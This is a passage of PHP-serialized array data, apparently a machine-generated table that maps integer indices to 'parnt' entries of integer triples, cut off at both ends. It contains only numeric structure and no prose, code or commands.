i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:282;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:178;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:287;i:1;i:0;i:2;i:1;}}}}i:439;a:5:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:154;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:145;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:227;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:440;a:6:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:2:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:19;i:1;i:0;i:2;i:2;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:170;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:41;i:1;i:0;i:2;i:1;}}}}i:441;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:442;a:5:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:154;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:41;i:1;i:0;i:2;i:1;}}}}i:443;a:6:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:288;i:1;i:0;i:2;i:1;}}}i:80;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:255;i:1;i:0;i:2;i:1;}}}}i:444;a:1:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:220;i:1;i:0;i:2;i:1;}}}}i:445;a:3:{i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:289;i:1;i:0;i:2;i:1;}}}}i:446;a:1:{i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:220;i:1;i:0;i:2;i:1;}}}}i:447;a:3:{i:41;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:289;i:1;i:0;i:2;i:1;}}}}i:448;a:2:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:220;i:1;i:0;i:2;i:1;}}}}i:449;a:3:{i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:289;i:1;i:0;i:2;i:1;}}}}i:450;a:2:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:220;i:1;i:0;i:2;i:1;}}}}i:451;a:3:{i:56;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:289;i:1;i:0;i:2;i:1;}}}}i:453;a:4:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:290;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:290;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:291;i:1;i:0;i:2;i:1;}}}i:67;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:286;i:1;i:0;i:2;i:1;}}}}i:454;a:2:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:107;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:178;i:1;i:0;i:2;i:1;}}}}i:455;a:1:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:292;i:1;i:0;i:2;i:1;}}}}i:456;a:3:{i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:293;i:1;i:0;i:2;i:1;}}}}i:457;a:1:{i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:292;i:1;i:0;i:2;i:1;}}}}i:458;a:3:{i:41;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:293;i:1;i:0;i:2;i:1;}}}}i:459;a:2:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:292;i:1;i:0;i:2;i:1;}}}}i:460;a:3:{i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:293;i:1;i:0;i:2;i:1;}}}}i:461;a:2:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:292;i:1;i:0;i:2;i:1;}}}}i:462;a:3:{i:56;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:293;i:1;i:0;i:2;i:1;}}}}i:464;a:4:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:294;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:294;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:135;i:1;i:0;i:2;i:1;}}}i:67;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:286;i:1;i:0;i:2;i:1;}}}}i:465;a:2:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:295;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:178;i:1;i:0;i:2;i:1;}}}}i:466;a:1:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:180;i:1;i:0;i:2;i:1;}}}}i:467;a:3:{i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:296;i:1;i:0;i:2;i:1;}}}}i:468;a:1:{i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:180;i:1;i:0;i:2;i:1;}}}}i:469;a:3:{i:41;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:296;i:1;i:0;i:2;i:1;}}}}i:470;a:2:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:180;i:1;i:0;i:2;i:1;}}}}i:471;a:3:{i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:296;i:1;i:0;i:2;i:1;}}}}i:472;a:2:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:180;i:1;i:0;i:2;i:1;}}}}i:473;a:3:{i:56;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:296;i:1;i:0;i:2;i:1;}}}}i:474;a:1:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}}i:475;a:10:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:259;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:107;i:1;i:0;i:2;i:1;}}}i:71;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:165;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:202;i:1;i:0;i:2;i:1;}}}i:82;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:46;i:1;i:0;i:2;i:1;}}}}i:476;a:8:{i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:141;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:90;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:151;i:1;i:0;i:2;i:1;}}}}i:477;a:7:{i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:158;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:46;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:297;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:297;i:1;i:0;i:2;i:1;}}}}i:478;a:1:{i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}}i:479;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:480;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:481;a:9:{i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:161;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:107;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:107;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:298;i:1;i:0;i:2;i:1;}}}}i:482;a:13:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:299;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:287;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:235;i:1;i:0;i:2;i:1;}}}i:51;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:300;i:1;i:0;i:2;i:1;}}}}i:483;a:7:{i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:235;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:235;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:301;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:146;i:1;i:0;i:2;i:1;}}}}i:484;a:1:{i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:485;a:3:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:302;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:303;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:304;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:305;i:1;i:0;i:2;i:3;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:306;i:1;i:0;i:2;i:1;}}}}i:486;a:3:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:307;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:308;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:309;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:310;i:1;i:0;i:2;i:3;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:311;i:1;i:0;i:2;i:1;}}}}i:487;a:4:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:312;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:313;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:314;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:315;i:1;i:0;i:2;i:3;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:316;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:317;i:1;i:0;i:2;i:1;}}}}i:488;a:3:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:318;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:319;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:320;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:321;i:1;i:0;i:2;i:3;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:322;i:1;i:0;i:2;i:1;}}}}i:489;a:3:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:323;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:324;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:325;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:326;i:1;i:0;i:2;i:3;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:327;i:1;i:0;i:2;i:1;}}}}i:490;a:3:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:328;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:329;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:330;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:331;i:1;i:0;i:2;i:3;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:332;i:1;i:0;i:2;i:1;}}}}i:491;a:3:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:333;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:334;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:335;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:336;i:1;i:0;i:2;i:3;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:337;i:1;i:0;i:2;i:1;}}}}i:492;a:3:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:338;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:339;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:340;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:341;i:1;i:0;i:2;i:3;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:342;i:1;i:0;i:2;i:1;}}}}i:493;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:494;a:4:{i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}}i:495;a:1:{i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:496;a:9:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:343;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:218;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:218;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}}i:497;a:12:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:69;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:106;i:1;i:0;i:2;i:1;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:344;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:345;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:346;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:347;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:164;i:1;i:0;i:2;i:1;}}}}i:498;a:8:{i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:348;i:1;i:0;i:2;i:1;}}}i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}}i:499;a:3:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i